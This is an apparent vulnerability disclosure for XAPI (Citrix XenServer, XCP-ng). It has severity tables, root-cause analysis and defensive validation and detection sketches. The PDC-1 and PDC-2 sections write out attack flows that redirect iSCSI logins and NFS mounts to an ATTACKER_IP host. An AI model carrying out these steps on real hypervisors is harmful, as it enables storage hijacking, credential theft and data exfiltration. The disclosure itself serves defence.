Original text by Jakob Wolffhechel · jakob@wolffhechel.dk

The “Shittrix” disclosure documents a 9-week independent security audit of XAPI, the management stack behind Citrix XenServer/Hypervisor and XCP-ng. The research claims 89 independently exploitable vulnerabilities caused by five architectural failures, especially writable Map(String,String) metadata fields that lack input validation and RBAC enforcement. A low-privileged vm-admin role can allegedly escalate impact through single XAPI calls, without root shell access or traditional exploit code. Critical examples include arbitrary host block-device mounting through VBD.other_config:backend-local, storage protocol injection via VDI.sm_config and SR.sm_config, system-domain privilege escalation through VM.other_config:is_system_domain, and iSCSI/NFS storage redirection via unchecked PBD.device_config. The impact includes host filesystem read/write, cross-VM disk exfiltration, storage MITM, cross-hypervisor data exposure, poisoned storage, and pool-wide compromise. The page also includes PoCs, evidence logs, patch proposals, IDS rules, and a rationale for day-0 public disclosure.

This is the public disclosure of a 9-week independent security audit of XAPI, the management stack used by Citrix XenServer/Hypervisor (commercial) and XCP-ng (open-source, maintained by Vates). The researcher has named this disclosure Shittrix for the input-validation failures that it documents.

The audit identified 89 independently exploitable vulnerabilities rooted in 5 architectural failures. Every writable Map(String,String) field across 8 XAPI object types has zero input validation. The lowest delegated management role (vm-admin) can achieve full host filesystem read/write, cross-VM data exfiltration, storage protocol injection, cross-hypervisor lateral movement, and pool-wide compromise through single API calls with no exploit code, no root shell, and no security alerts.

These vulnerabilities have existed since XAPI was first written (~2006). Every version of Citrix XenServer/Hypervisor is affected.

Cloud Software Group is a signatory to CISA’s Secure by Design pledge, committing to reduce entire classes of vulnerability across its products.

1. At a glance

| Metric | Value |
|---|---|
| Independently exploitable vulnerabilities | 89 |
| Architectural root causes | 5 |
| Critical findings (CVSS 9.1 – 9.9) | 5 (3 x 9.9, 2 x 9.1) |
| High findings (CVSS 7.0 – 8.9) | 28 |
| Medium findings (CVSS 4.0 – 6.9) | 46 |
| Low findings (CVSS 2.0 – 3.9) | 10 |
| Proof-of-concept scripts (Python, framework-based) | 124 |
| Evidence logs from live testing | 206 |
| Per-vulnerability security advisories | 89 (at cna.moksha.dk) |
| Upstream patch proposals (ready-to-merge) | 19 |
| IDS detection rules | 42 (across 5 categories) |
| Writable Map(String,String) fields with zero validation | 88 (across 8 object types) |
| Cross-hypervisor data exfiltration proven on | Proxmox VE, VMware, Nutanix, XenServer |
| Audit duration | 9 weeks |
| Testing environment | Own production-grade hardware; no unauthorized access |

Affected products

- Citrix XenServer / Citrix Hypervisor – all versions, commercial product of Cloud Software Group

- XCP-ng – all versions, open-source downstream maintained by Vates

- Any XAPI-based hypervisor distribution

Downstream / collateral impact

- Storage arrays (NetApp, Dell EMC, Pure, HPE): silent protocol injection through the hypervisor as proxy. Indistinguishable from normal storage I/O.

- Management orchestrators (Xen Orchestra, CloudStack, OpenStack): trust XAPI metadata that is attacker-controlled.

- Backup systems: trust XAPI metadata, can be tricked into backing up attacker-chosen disks.

- Monitoring systems: ingest XAPI metadata as ground truth; can be poisoned.

- Cross-hypervisor platforms on shared storage: Proxmox, VMware, Nutanix VMs readable from an XAPI host on the same backing storage.

2. BOC-1: arbitrary host device mount (CVSS 9.9 Critical)

Designation: BOC-1 (Backend Override Control, Finding 1)

CVSS 3.1: 9.9 Critical · AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0: 9.4 Critical

A user with the vm-admin role (the lowest delegated management role in XCP-ng / Citrix Hypervisor) can mount any host block device as a guest virtual disk by writing an arbitrary filesystem path to VBD.other_config:backend-local.

When the VBD is plugged, XAPI reads this key and passes the path directly to xenopsd – with no validation, no access control check, and only a warning-level log message. The vulnerability requires a single API call, no exploit code, no root or shell access, and produces no security alerts.
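Because the write raises no security alert, operators may want to sweep existing VBD records for the key. The following is a minimal sketch, assuming the records have already been fetched as a mapping from VBD reference to record dict. The record shape and the helper name `find_backend_local_overrides` are assumptions made for illustration, not part of XAPI.

```python
def find_backend_local_overrides(vbd_records):
    """Return (vbd_ref, vm_ref, path) for every VBD whose other_config
    carries a backend-local key. Any hit deserves manual review."""
    hits = []
    for ref, record in vbd_records.items():
        other_config = record.get("other_config", {})
        if "backend-local" in other_config:
            hits.append((ref, record.get("VM"), other_config["backend-local"]))
    # Sort by VBD reference so repeated sweeps are easy to diff.
    return sorted(hits, key=lambda hit: hit[0])
```

With the XenAPI Python bindings, `VBD.get_all_records()` is expected to return a mapping of this shape; that should be verified against the deployed version before relying on the sweep.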

Immediate impact

- Full host filesystem read/write (including /etc/shadow, XAPI state.db, SSH keys)

- RBAC collapse: vm-admin escalates to full pool-admin-equivalent access

- Lateral movement across every host on shared storage

- Cross-hypervisor boundary crossing: VM disks on shared storage belonging to Proxmox VE, VMware, or Nutanix are readable from the XAPI host

- Arbitrary block device mount: raw storage LUNs, SAN metadata volumes, tape backend devices

Root causes

- Missing RBAC protection: VBD.other_config has zero map_keys_roles entries in datamodel.ml. Every infrastructure-critical key is writable by vm-admin via add_to_other_config.

- Missing validation: backend_of_vbd in xapi_xenops.ml consumes the backend-local key without path validation, access control, or security logging.

- set_other_config RBAC bypass: The set_other_config method replaces the entire map and bypasses map_keys_roles per-key checks entirely. This is an architectural limitation shared by all XAPI objects.
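The whole-map bypass can be illustrated with a toy model. This is a sketch in Python, not XAPI's OCaml. It supposes a per-key entry exists for backend-local (the text above says VBD.other_config currently has none), and the role ordering, the `ToyVBD` class, and the `MAP_KEYS_ROLES` table are all simplifications invented for the example.

```python
# Simplified role ordering; real XAPI defines more roles than these three.
RANK = {"vm-admin": 1, "pool-operator": 2, "pool-admin": 3}

# Hypothetical per-key restriction, standing in for a map_keys_roles entry.
MAP_KEYS_ROLES = {"backend-local": "pool-admin"}


class ToyVBD:
    """Toy stand-in for an object with a Map(String,String) field."""

    def __init__(self):
        self.other_config = {}

    def add_to_other_config(self, role, key, value):
        # Per-key path: the caller's role is compared with the key's entry.
        required = MAP_KEYS_ROLES.get(key)
        if required is not None and RANK[role] < RANK[required]:
            raise PermissionError(f"{role} may not write {key}")
        self.other_config[key] = value

    def set_other_config(self, role, new_map):
        # Whole-map path: no per-key lookup happens, so the role is unused.
        self.other_config = dict(new_map)
```

In this model a vm-admin is refused by `add_to_other_config` but reaches the same end state through `set_other_config`, which is the shape of the gap described above.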

Confirmed exploitation (live-tested)

- Cross-VM VDI exfiltration: read any co-hosted VM’s disk contents

- Host root filesystem read: /etc/shadow, XAPI state.db, SSH keys – 8/8 scenarios pass

- Host filesystem write: modify binaries, implant backdoors

- Cross-hypervisor data exfiltration on shared storage: Proxmox VE, VMware, Nutanix VMs readable from XAPI host

- Hypervisor-in-hypervisor (the Escher scenario): the hypervisor’s own dom0 root disk can be mounted as a VBD on a new VM through the same single API call, and the VM will successfully boot XenServer/XCP-ng from it. The hypervisor is now running as a guest inside itself. The nested instance has its own root filesystem, its own XAPI, its own control plane – a full working hypervisor, booted from the disk of the hypervisor hosting it. Beyond the obvious visual absurdity, this demonstrates that dom0 protections are not meaningful security boundaries under BOC-1: a vm-admin can materialise an exact working copy of the host’s own trusted-computing base inside the VM scheduling layer the host itself controls. Trust domain collapse, demonstrated live.

3. SMC-1: storage protocol injection (CVSS 9.9 Critical)

Designation: SMC-1 (Storage Metadata Control, Finding 1)

CVSS 3.1: 9.9 Critical · AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0: 8.6 High

A low-privilege user can inject storage protocol commands (iSCSI, NFS, FC, SMB) through the hypervisor by writing attacker-controlled values to VDI.sm_config and SR.sm_config fields. The hypervisor becomes a silent proxy, forwarding malformed commands to storage arrays. The traffic is indistinguishable from normal storage I/O from the storage vendor’s perspective.

Why storage vendors are collateral victims

Storage array vendors (NetApp, Dell EMC, Pure Storage, HPE, and cloud-hosted storage services with iSCSI/NFS endpoints) operate on the assumption that commands arriving from a hypervisor host are trusted by that host. When the hypervisor itself is a silent proxy for attacker-controlled protocol commands, storage vendor detection capabilities do not apply – the traffic looks legitimate at the storage array layer.

This is why SMC-1 is classified as multi-vendor and why detection rules (section 10) include storage-vendor-targeted signatures, not only XAPI-layer signatures.

4. VOC-1: system domain privilege escalation (CVSS 9.9 Critical)

Designation: VOC-1 (VM Other Config, Finding 1)

CVSS 3.1: 9.9 Critical · AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0: 8.6 High

A vm-admin can promote any VM to system domain status by writing is_system_domain=true to VM.other_config. This key is intended as an internal infrastructure flag set only by XAPI itself, but VM.other_config has no map_keys_roles protection for this key.

System domain status is a privileged designation in XAPI. The function at system_domains.ml:30-35 checks is_control_domain (read-only boolean) OR the other_config key – and since the other_config path has no RBAC, any vm-admin can set it on any VM.
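The OR condition described above can be sketched in Python to show why the writable key is enough, and to list VMs that qualify only through it. The real check is OCaml in system_domains.ml; the record shape, the string parsing of the flag, and both function names here are assumptions for illustration.

```python
def is_system_domain(vm):
    """Mirror of the described check: control-domain flag OR other_config key."""
    flag = vm.get("other_config", {}).get("is_system_domain", "false")
    # Assumption: the flag is treated as true when it reads "true".
    return bool(vm.get("is_control_domain", False)) or flag.strip().lower() == "true"


def self_declared_system_domains(vm_records):
    """VMs that count as system domains only because of the writable key."""
    return sorted(
        ref
        for ref, vm in vm_records.items()
        if is_system_domain(vm) and not vm.get("is_control_domain", False)
    )
```

Legitimate infrastructure VMs may also appear in the second list, so its output is a review queue rather than proof of abuse.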

What system domain status grants

- VBD sharing bypass. The VBD sharing check exempts system domains, allowing concurrent write access to non-sharable VDIs. A regular VM mounting a VDI already in use by another VM is blocked; a system-domain VM is not.

- Access to query_services. This VM operation is gated specifically for infrastructure VMs at xapi_vm_lifecycle.ml:718-720.

- Lifecycle restriction bypass. System domains are exempted from certain lifecycle state machine checks, allowing operations rejected on regular VMs.

Confirmed exploitation (live-tested)

- VBD sharing bypass: concurrent write access to non-sharable VDIs owned by other VMs – 6/6 PASS

- query_services access: infrastructure-only VM operation accessible – confirmed

- VOC-1 + VOC-2 chain: system domain status + storage_driver_domain = PBD detach DoS on VM shutdown

5. PDC-1: iSCSI target redirection (CVSS 9.1 Critical)

Designation: PDC-1 (PBD Device Config, Finding 1)

CVSS 3.1: 9.1 Critical · AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0: 8.7 High

A pool-operator can create an iSCSI SR with attacker-controlled target and targetIQN values in PBD.device_config. The SM driver reads these values and passes them directly to iscsiadm for iSCSI discovery and login. The hypervisor connects to the attacker’s iSCSI target instead of the legitimate storage array.

The storage man-in-the-middle

This is a complete storage MITM. The attack flow:

SR.create(device_config={target: ATTACKER_IP, targetIQN: ATTACKER_IQN})

-> PBD stored with unchecked values

-> PBD.plug() triggers BaseISCSI.load()

-> iscsiadm -m discovery -t sendtargets -p ATTACKER_IP

-> iscsiadm -m node --login -T ATTACKER_IQN -p ATTACKER_IP

-> Hypervisor connects to attacker-controlled iSCSI target

No IP address validation, no IQN format verification, no allowlist check at any point. The attacker serves malicious disk images to VMs, captures all VM I/O, and intercepts CHAP credentials in transit.
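The three missing checks (address validation, IQN format, allowlist) could look roughly like the sketch below. It is a hypothetical pre-flight validator, not code from the SM driver: the function name, the allowlist inputs, and the choice to require an IP literal for target are assumptions, and the regular expression is only a loose approximation of the iqn.yyyy-mm.naming-authority:name form.

```python
import ipaddress
import re

# Loose approximation of the IQN form: iqn.<year>-<month>.<authority>[:<name>]
IQN_RE = re.compile(
    r"iqn\.\d{4}-(0[1-9]|1[0-2])\.[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::\S+)?"
)


def validate_iscsi_device_config(device_config, allowed_networks, allowed_iqns):
    """Return a list of problems; an empty list means the values are allowed."""
    errors = []
    try:
        addr = ipaddress.ip_address(device_config.get("target", ""))
    except ValueError:
        errors.append("target is not an IP address literal")
    else:
        if not any(addr in net for net in allowed_networks):
            errors.append("target is outside the approved storage networks")
    iqn = device_config.get("targetIQN", "")
    if IQN_RE.fullmatch(iqn) is None:
        errors.append("targetIQN is not a well-formed IQN")
    elif iqn not in allowed_iqns:
        errors.append("targetIQN is not on the allow-list")
    return errors
```

Returning a list of problems rather than raising on the first one keeps the result usable for logging, which matters given that the current behaviour leaves no trace.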

Confirmed exploitation (live-tested)

- Storage MITM: attacker serves malicious disk images – ALL PASS

- CHAP credential theft: intercepting CHAP authentication during iSCSI login – ALL PASS

- BOC-1 chain: vm-admin escalates to pool-operator via BOC-1, then exploits PDC-1

Downstream impact

Enterprise storage arrays (NetApp, Dell EMC, Pure, HPE) and cloud-hosted iSCSI endpoints receive connections from attacker-redirected hosts. From the storage vendor’s perspective, the connection looks legitimate.

6. PDC-2: NFS server redirection (CVSS 9.1 Critical)

Designation: PDC-2 (PBD Device Config, Finding 2)

CVSS 3.1: 9.1 Critical · AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0: 8.7 High

The NFS counterpart to PDC-1. A pool-operator creates an NFS SR with attacker-controlled server and serverpath in PBD.device_config. The SM driver passes these to mount.nfs without validation. The hypervisor mounts the attacker’s NFS export as a storage repository.

SR.create(device_config={server: ATTACKER_IP, serverpath: /evil})

-> PBD stored with unchecked values

-> PBD.plug() triggers NFSSR.load()

-> mount.nfs ATTACKER_IP:/evil /var/run/sr-mount/<sr-uuid>

-> All VMs on this SR serve from attacker-controlled NFS export

Impact

- Complete storage compromise: the attacker controls all VM disk images on the SR

- Data exfiltration: all VM writes go to attacker-controlled storage

- Malware injection: poisoned VHD files served to VMs at boot

- BOC-1 chain: vm-admin escalates to pool-operator via BOC-1, then exploits PDC-2

Confirmed exploitation (live-tested)

- Storage hijack: all VMs on the SR served from attacker NFS export – ALL PASS

- Data exfiltration: all VM writes captured – ALL PASS

PDC-1 and PDC-2 share the same root cause: SM drivers trust device_config values without validation. The attack primitives differ (iSCSI login vs. NFS mount), but the architectural gap is identical.
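For the NFS case, validation of device_config before it reaches mount.nfs might be sketched as follows. This is an illustrative assumption, not the SM driver's code: the function name and the `allowed_exports` structure (approved server IP mapped to approved export paths) are invented for the example.

```python
import ipaddress
import posixpath


def validate_nfs_device_config(device_config, allowed_exports):
    """Return a list of problems; an empty list means the values are allowed.

    allowed_exports maps a server IP string to the set of export paths
    that operators have approved for it.
    """
    errors = []
    server = device_config.get("server", "")
    path = device_config.get("serverpath", "")
    try:
        server = str(ipaddress.ip_address(server))
    except ValueError:
        errors.append("server is not an IP address literal")
    else:
        if server not in allowed_exports:
            errors.append("server is not on the allow-list")
    # Reject relative paths and anything containing "..", "." or a trailing slash.
    if not path.startswith("/") or posixpath.normpath(path) != path:
        errors.append("serverpath is not an absolute, normalised path")
    elif path not in allowed_exports.get(server, set()):
        errors.append("serverpath is not an approved export for this server")
    return errors
```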



7. Full advisory list (89)

Every MOKSHA advisory below is an independent finding with its own CVSS score, root cause analysis, affected code paths, exploitation scenarios, and remediation guidance. Each advisory is published at cna.moksha.dk with a companion machine-readable CVE JSON 5.1 record. The CSIRT-scoped supporting materials (PoC scripts, evidence logs, per-advisory detection rules) are available on request – see how to reach me.

| MOKSHA ID | Semantic ID | Title | Severity |
|---|---|---|---|
| MOKSHA-2026-0001 | BOC-1 | Arbitrary Host Device Mount via VBD.other_config backend-local | Critical – CVSS 9.9 |
| MOKSHA-2026-0002 | SMC-1 | Storage Protocol Injection via sm_config | Critical – CVSS 9.9 |
| MOKSHA-2026-0003 | VOC-1 | System Domain Privilege Escalation via is_system_domain | Critical – CVSS 9.9 |
| MOKSHA-2026-0004 | PDC-1 | iSCSI Target Redirection via PBD.device_config | Critical – CVSS 9.1 |
| MOKSHA-2026-0005 | PDC-2 | NFS Server Redirection via PBD.device_config | Critical – CVSS 9.1 |
| MOKSHA-2026-0006 | DOC-2 | Storage Migration Redirection via VDI.other_config maps_to | High – CVSS 8.5 |
| MOKSHA-2026-0007 | BOC-2 | Backend-Kind I/O Driver Type Confusion via VBD.other_config | High – CVSS 7.5 |
| MOKSHA-2026-0008 | VOC-2 | Storage Driver Domain PBD Detach DoS via VM.other_config | High – CVSS 8.2 |
| MOKSHA-2026-0009 | PLAT-6 | QEMU Serial Host Filesystem Write via VM.platform hvm_serial | High – CVSS 8.5 |
| MOKSHA-2026-0010 | PDC-5 | Block Device Path Injection via PBD.device_config | High – CVSS 8.4 |
| MOKSHA-2026-0011 | NOC-1 | VIF Backend VM Hijack via Network.other_config backend_vm | High – CVSS 8.4 |
| MOKSHA-2026-0012 | NOC-2 | OVS Fail-Mode Denial of Service via Network.other_config | High – CVSS 8.2 |
| MOKSHA-2026-0013 | PLOC-6 | Pool-Wide OVS Fail-Mode Denial of Service via Pool.other_config | High – CVSS 8.2 |
| MOKSHA-2026-0014 | PDC-6 | Local Initiator IQN Injection via PBD.device_config | High – CVSS 8.1 |
| MOKSHA-2026-0015 | SSMC-2 | VHD Format Flag Corruption via SR.sm_config use_vhd | High – CVSS 7.6 |
| MOKSHA-2026-0016 | PLAT-2 | PVinPVH Xen Kernel Command-Line Injection via VM.platform | High – CVSS 7.6 |
| MOKSHA-2026-0017 | NOC-3 | Static Route Injection via Network.other_config | High – CVSS 7.6 |
| MOKSHA-2026-0018 | PLOC-2 | HA Timeout Manipulation via Pool.other_config (Split-Brain/Blindness) | High – CVSS 7.6 |
| MOKSHA-2026-0019 | DOC-1 | Tapdisk Memory Pool Injection via VDI.other_config mem-pool | High – CVSS 7.5 |
| MOKSHA-2026-0020 | DOC-4 | CBT Metadata Corruption via VDI.other_config content_id | High – CVSS 7.1 |
| MOKSHA-2026-0021 | VIOC-2 | Cross-VM Traffic Sniffing via VIF.other_config Promiscuous Mode | High – CVSS 7.5 |
| MOKSHA-2026-0022 | BQP-1 | Real-Time I/O Class Abuse via VBD.qos_algorithm_params – Cross-VM Starvation | High – CVSS 7.5 |
| MOKSHA-2026-0023 | PLOC-3 | Guest Agent Script Execution Enablement via Pool.other_config | High – CVSS 7.2 |
| MOKSHA-2026-0024 | PDC-3 | NFS Mount Option Injection via PBD.device_config | High – CVSS 7.2 |
| MOKSHA-2026-0025 | SSMC-3 | Storage Protocol Metadata Poisoning via SR.sm_config (targetIQN/target/LUNid) | High – CVSS 7.2 |
| MOKSHA-2026-0026 | HOC-1 | Python Module Import Injection via Host.other_config multipathhandle | High – CVSS 7.2 |
| MOKSHA-2026-0027 | POC-2 | Gateway/DNS Routing Hijack via PIF.other_config defaultroute/peerdns | High – CVSS 7.2 |
| MOKSHA-2026-0028 | BOC-4 | VDI Lifecycle Corruption via VBD.other_config owner Key | High – CVSS 7.1 |
| MOKSHA-2026-0029 | VIOC-1 | SR-IOV VIF Whitelist Bypass via VIF.other_config | High – CVSS 7.1 |
| MOKSHA-2026-0030 | VOC-3 | XML Injection in Template Provisioning via VM.other_config disks | High – CVSS 7.1 |
| MOKSHA-2026-0031 | XSD-1 | Guest Agent Poisoning via VM.xenstore_data vm-data Injection | High – CVSS 7.1 |
| MOKSHA-2026-0032 | XSD-3 | Bidirectional Data Exfiltration via VM.xenstore_data Guest-to-XAPI-DB Sync | High – CVSS 7.1 |
| MOKSHA-2026-0033 | VQP-1 | Rate Limit Bypass via VIF.qos_algorithm_params Large kbps Overflow | High – CVSS 7.1 |
| MOKSHA-2026-0034 | DOC-5 | Coalesce Blocking via VDI.other_config leaf-coalesce | Medium – CVSS 6.8 |
| MOKSHA-2026-0035 | HOC-2 | iSCSI Initiator Identity Spoofing via Host.other_config iscsi_iqn | Medium – CVSS 6.8 |
| MOKSHA-2026-0036 | SOC-2 | LVM Configuration Injection via SR.other_config lvm-conf | Medium – CVSS 6.7 |
| MOKSHA-2026-0037 | SOC-3 | VHD Test Mode and Failure Injection via SR.other_config testmode | Medium – CVSS 6.5 |
| MOKSHA-2026-0038 | SSMC-1 | Provisioning Type Manipulation via SR.sm_config allocation | Medium – CVSS 6.5 |
| MOKSHA-2026-0039 | SSMC-4 | Filesystem Layout Manipulation via SR.sm_config nosubdir/subdir | Medium – CVSS 6.5 |
| MOKSHA-2026-0040 | PDC-4 | CHAP Credential Exposure via PBD.device_config | Medium – CVSS 6.5 |
| MOKSHA-2026-0041 | PLOC-1 | Rolling Upgrade State Injection via Pool.other_config | Medium – CVSS 6.5 |
| MOKSHA-2026-0042 | PLOC-4 | SMTP Server Redirection / Credential Exfiltration via Pool.other_config | Medium – CVSS 6.5 |
| MOKSHA-2026-0043 | PLOC-5 | PBD Synchronization Bypass via Pool.other_config sync_create_pbds | Medium – CVSS 6.5 |
| MOKSHA-2026-0044 | PLAT-1 | QEMU -parallel Path Traversal (VM DoS) via VM.platform | Medium – CVSS 6.5 |
| MOKSHA-2026-0045 | POC-1 | Arbitrary Bond Property Injection via PIF.other_config bond-* | Medium – CVSS 6.5 |
| MOKSHA-2026-0046 | POC-3 | MTU Manipulation / Network Partition via PIF.other_config | Medium – CVSS 6.5 |
| MOKSHA-2026-0047 | POC-5 | DNS Search Domain Injection via PIF.other_config domain | Medium – CVSS 6.1 |
| MOKSHA-2026-0048 | HOC-3 | Storage Availability Disruption via Host.other_config multipathing | Medium – CVSS 5.5 |
| MOKSHA-2026-0049 | NOC-4 | HIMN Identity Hijack + DHCP Manipulation via Network.other_config | Medium – CVSS 5.5 |
| MOKSHA-2026-0050 | SSMC-5 | LUNperVDI Mode Manipulation via SR.sm_config | Medium – CVSS 5.5 |
| MOKSHA-2026-0051 | DOC-7 | Config Drive Misidentification via VDI.other_config config-drive | Medium – CVSS 5.4 |
| MOKSHA-2026-0052 | BOC-5 | Leaked VBD Detection Spoofing via task_id/related_to | Medium – CVSS 5.3 |
| MOKSHA-2026-0053 | VIOC-3 | MTU Manipulation (0-65535) via VIF.other_config | Medium – CVSS 5.3 |
| MOKSHA-2026-0054 | VOC-4 | MAC Address Collision via VM.other_config mac_seed | Medium – CVSS 5.3 |
| MOKSHA-2026-0055 | VOC-5 | set_other_config RBAC Bypass for PCI Passthrough Key | Medium – CVSS 5.3 |
| MOKSHA-2026-0056 | VOC-6 | Console Access Manipulation via VM.other_config disable_pv_vnc | Medium – CVSS 5.3 |
| MOKSHA-2026-0057 | XSD-2 | FIST Namespace Exposure via VM.xenstore_data | Medium – CVSS 5.3 |
| MOKSHA-2026-0058 | XSD-4 | Xenstore Quota Exhaustion via VM.xenstore_data | Medium – CVSS 5.3 |
| MOKSHA-2026-0059 | XSD-5 | Multi-Tenant Trust Confusion via VM.xenstore_data | Medium – CVSS 5.3 |
| MOKSHA-2026-0060 | BQP-2 | Arbitrary Integer Passthrough to ionice via VBD.qos_algorithm_params | Medium – CVSS 5.3 |
| MOKSHA-2026-0061 | BQP-3 | I/O Scheduling Downgrade to Idle Class via VBD.qos_algorithm_params | Medium – CVSS 5.3 |
| MOKSHA-2026-0062 | VQP-2 | Rate Limit Removal via kbps=0 in VIF.qos_algorithm_params | Medium – CVSS 5.3 |
| MOKSHA-2026-0063 | VQP-3 | Negative kbps Injection in VIF.qos_algorithm_params | Medium – CVSS 5.3 |
| MOKSHA-2026-0064 | VXD-1 | Database Field Poisoning via VDI.xenstore_data Arbitrary Keys | Medium – CVSS 5.3 |
| MOKSHA-2026-0065 | VXD-2 | SCSI Identity Forgery in XAPI Database via VDI.xenstore_data | Medium – CVSS 5.3 |
| MOKSHA-2026-0066 | VXD-3 | Metadata Propagation via VDI Snapshot and Clone Operations | Medium – CVSS 5.3 |
| MOKSHA-2026-0067 | VXD-4 | Cross-Pool Metadata Injection via VDI.xenstore_data on Pool Join | Medium – CVSS 5.3 |
| MOKSHA-2026-0068 | PLAT-4 | Guest Xenstore Data Injection via VM.platform Map | Medium – CVSS 5.3 |
| MOKSHA-2026-0069 | PLAT-5 | Hypervisor Security Feature Manipulation via VM.platform (nx/hap) | Medium – CVSS 5.3 |
| MOKSHA-2026-0070 | VIOC-5 | Infrastructure Metadata Leak via SR-IOV VIF Xenstore Passthrough | Medium – CVSS 5.0 |
| MOKSHA-2026-0071 | NOC-5 | OVS In-Band Management Disablement via Network.other_config | Medium – CVSS 4.9 |
| MOKSHA-2026-0072 | HOC-4 | SR Scan Interval Manipulation via Host.other_config auto-scan-interval | Medium – CVSS 4.9 |
| MOKSHA-2026-0073 | SOC-4 | SR Destruction Protection Bypass and DoS via SR.other_config indestructible | Medium – CVSS 4.9 |
| MOKSHA-2026-0074 | SOC-5 | GC and Coalesce Disablement via SR.other_config | Medium – CVSS 4.9 |
| MOKSHA-2026-0075 | PLOC-7 | Memory Ratio Bounds Relaxation via Pool.other_config | Medium – CVSS 4.9 |
| MOKSHA-2026-0076 | POC-4 | Network Offload Disablement via PIF.other_config ethtool Keys | Medium – CVSS 4.9 |
| MOKSHA-2026-0077 | VIOC-4 | VIF NIC Offload Disablement via VIF.other_config ethtool Keys | Medium – CVSS 4.3 |
| MOKSHA-2026-0078 | DOC-6 | Guest Clock Manipulation via VDI.other_config timeoffset | Medium – CVSS 4.3 |
| MOKSHA-2026-0079 | NOC-6 | Network Sharing Bypass via Network.other_config assume_network_is_shared | Medium – CVSS 4.1 |
| MOKSHA-2026-0080 | SOC-1 | I/O Scheduler Sysfs Injection via SR.other_config scheduler | Low – CVSS 3.8 |
| MOKSHA-2026-0081 | BOC-3 | I/O Polling Parameter Manipulation via VBD.other_config polling-duration | Low – CVSS 3.1 |
| MOKSHA-2026-0082 | DOC-3 | VDI Lifecycle Behavior Manipulation via VDI.other_config on_boot/cbt_enabled | Low – CVSS 3.1 |
| MOKSHA-2026-0083 | HBP-1 | Boot Order Manipulation via VM.HVM_boot_params order | Low – CVSS 3.1 |
| MOKSHA-2026-0084 | HBP-2 | Firmware Type Denial of Service via VM.HVM_boot_params firmware | Low – CVSS 3.1 |
| MOKSHA-2026-0085 | LPC-1 | Feature Restriction Bypass via Host.license_params restrict_* Keys | Low – CVSS 2.3 |
| MOKSHA-2026-0086 | LPC-2 | License Expiry Manipulation via Host.license_params expiry | Low – CVSS 2.3 |
| MOKSHA-2026-0087 | PLAT-3 | QEMU Device Model Selection via VM.platform device-model (Limited by Whitelist) | Low – CVSS 2.3 |
| MOKSHA-2026-0088 | VQP-4 | Int64 Overflow in bytes_per_interval via VIF.qos_algorithm_params | Low – CVSS 2.3 |
| MOKSHA-2026-0089 | VQP-5 | Raw kbps Value Exposure in Private Xenstore via VIF.qos_algorithm_params | Low – CVSS 2.3 |

Note: CVSS scoring is deliberately conservative. Many findings that chain with BOC-1 or SMC-1 would produce substantially higher combined scores. Chained severity analysis is in the full advisory documents at cna.moksha.dk.
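The CVSS 3.1 base scores quoted for the five critical findings can be reproduced from their vectors. The sketch below follows the base-score equations, weights, and rounding rule of the CVSS 3.1 specification published by FIRST. It handles base metrics only, and the function name `cvss31_base` is chosen here for illustration.

```python
import math

AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place, avoiding floating-point artefacts."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def cvss31_base(vector):
    """Base score for a vector such as AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H."""
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    total = 1.08 * (impact + exploitability) if changed else impact + exploitability
    return roundup(min(total, 10))
```

Applied to the vectors above, the PR:L vector shared by BOC-1, SMC-1, and VOC-1 evaluates to 9.9, and the PR:H vector shared by PDC-1 and PDC-2 evaluates to 9.1. The only difference between the two groups is the Privileges Required weight (0.68 versus 0.5 under changed scope).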

8. Assume compromise – threat model and responsibility

Assume compromise has already occurred. This is not a precautionary framing. The attack surface – input validation on writable API fields – is the most trivially audited class of vulnerability in software. The code has been open-source since 2013, and the proprietary closed-source predecessor goes back to 2006. Anyone with the patience to read the same source code that one Danish sysadmin read in the spring of 2026 has had somewhere between 13 and 20 years to find the same 89 patterns. The disclosure posture that matches the threat model is therefore this: we have no way of knowing how long these have been exploited in the wild, but it is statistically implausible that the wild has not found them already. Well-resourced threat actors – state and non-state – have had ample time, motive, and access to the source. Some subset of these 89 is almost certainly already weaponised somewhere. This is not a “prevent future exploitation” problem alone. It is also a “detect existing exploitation” problem. The IDS rules are the artifact for that second half.

For deployers in regulated or high-assurance environments – this is a transitive-trust collapse. BOC-1 (CVSS 9.9) enables cross-hypervisor data exfiltration on shared storage: a vm-admin on an XAPI host can read VM disks belonging to Proxmox VE, VMware, Nutanix, and other XenServer hosts sharing the same storage backend. SMC-1 (CVSS 9.9) turns the hypervisor into a silent proxy for malformed storage-protocol commands; the traffic is indistinguishable from legitimate storage I/O at the array. Under any regulatory framework that depends on confidentiality guarantees being preservable (HIPAA, PCI-DSS, NIS2, GDPR special categories, financial-sector secrecy rules, government classified-data handling, critical-infrastructure directives), the remediation is not “patch and continue.” The remediation is:

- Any Citrix XenServer or XCP-ng host that has been in production since the 2006-onwards exposure window must be treated as potentially compromised

- Any shared storage array that was reachable from one of those hosts must be treated as potentially compromised (BOC-1 cross-hypervisor scope)

- Any VM that was ever stored on that shared storage – including VMs belonging to Proxmox, VMware, Nutanix, or other hypervisors on the same backing storage – must be treated as potentially compromised

